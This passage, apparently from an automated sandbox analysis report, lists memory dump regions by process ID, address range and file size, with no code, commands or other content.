                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/4124-243-0x0000000001315000-0x0000000001316000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4124-238-0x0000000001312000-0x0000000001314000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/4124-227-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4148-262-0x00000000008D0000-0x00000000008E2000-memory.dmp
                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/4148-255-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4148-261-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/4192-235-0x0000000000FC0000-0x0000000000FCD000-memory.dmp
                                                                                                                Filesize

                                                                                                                52KB

                                                                                                              • memory/4192-232-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4308-263-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4368-249-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4368-340-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4440-337-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4512-313-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/4512-264-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4648-367-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4652-362-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4652-348-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4668-364-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4708-251-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4708-351-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4904-306-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4924-322-0x0000000004B87000-0x0000000004C88000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/4924-326-0x0000000003280000-0x00000000032DC000-memory.dmp
                                                                                                                Filesize

                                                                                                                368KB

                                                                                                              • memory/4924-310-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4948-252-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4972-253-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4976-270-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4976-279-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4976-285-0x00000000053C0000-0x00000000053C1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4976-276-0x0000000000A70000-0x0000000000A71000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4976-278-0x0000000005200000-0x0000000005202000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/4976-284-0x0000000005360000-0x0000000005361000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4976-289-0x0000000005400000-0x0000000005401000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4976-281-0x00000000058F0000-0x00000000058F1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4976-297-0x00000000055A0000-0x00000000055A1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5052-267-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5256-304-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5300-280-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5556-288-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5672-345-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5688-346-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5704-368-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5724-294-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5744-344-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5784-350-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5824-347-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5860-349-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6060-325-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6112-328-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6168-353-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6220-361-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6240-354-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6300-355-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6420-357-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6424-356-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6532-358-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6736-359-0x0000000000402F68-mapping.dmp
                                                                                                              • memory/6828-360-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6932-369-0x0000000000000000-mapping.dmp
                                                                                                              • memory/7060-365-0x0000000000000000-mapping.dmp